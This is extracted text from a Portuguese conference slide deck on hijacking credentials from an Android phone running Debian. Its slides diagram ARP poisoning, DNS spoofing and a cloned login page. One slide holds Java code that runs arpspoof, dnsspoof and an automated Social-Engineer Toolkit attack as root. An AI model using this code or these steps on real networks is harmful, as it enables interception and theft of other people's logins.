Más contenido relacionado Debian com Android para Sequestro de Credencias1. + =
Debian com Android Para Sequesto de
Credenciais
WILBERTO FILHO
Partec - Tangerina Lab
wilbertofilho@tangerinalab.com
19. Porque ARP Poisoning?
10.0.0.5
Internet
10.0.0.3
10.0.0.1
Quem é 10.0.0.1?
192.168.1.1
10.0.0.2
10.0.0.4
20. Porque ARP Poisoning?
10.0.0.5
EU!
Internet
10.0.0.3
10.0.0.1
Quem é 10.0.0.1?
192.168.1.1
10.0.0.2
10.0.0.4
22. Porque DNS Spoofing?
Quero www.facebook.com!
OK!
DNS Request
- Servidor DNS
- Servidor HTTP
- Página Clonada
23. Porque placa em promiscous?
Quero www.google.com!
OK!
DNS Request
Internet ...
35. Usando o ataque
public void prepararAmbiente() throws IOException, InterruptedException {
Process p=Runtime.getRuntime().exec("su");
DataOutputStream stream=new DataOutputStream(p.getOutputStream());
stream.writeBytes("mount -o loop -t ext4 /sdcard/debian.img /data/local/debian");
stream.writeBytes("busybox chroot /data/local/debian /bin/bash -c '/usr/bin/nohup
/usr/sbin/arpspoof -i wlan0 192.168.1.1&'");
stream.writeBytes("busybox chroot /data/local/debian /bin/bash -c
'/usr/bin/nohup /usr/sbin/dnsspoof -i wlan0 -f /home/wilberto/spoof.txt&'");
stream.writeBytes("busybox chroot /data/local/debian /bin/bash -c
'/home/wilberto/set/set-automate droidhawk.txt'");
stream.close();
p.destroy();
}
38. Obrigado!
João Paulo
Tiago Ferreira
Paula Cavalcanti
E a todos vocês pela atenção!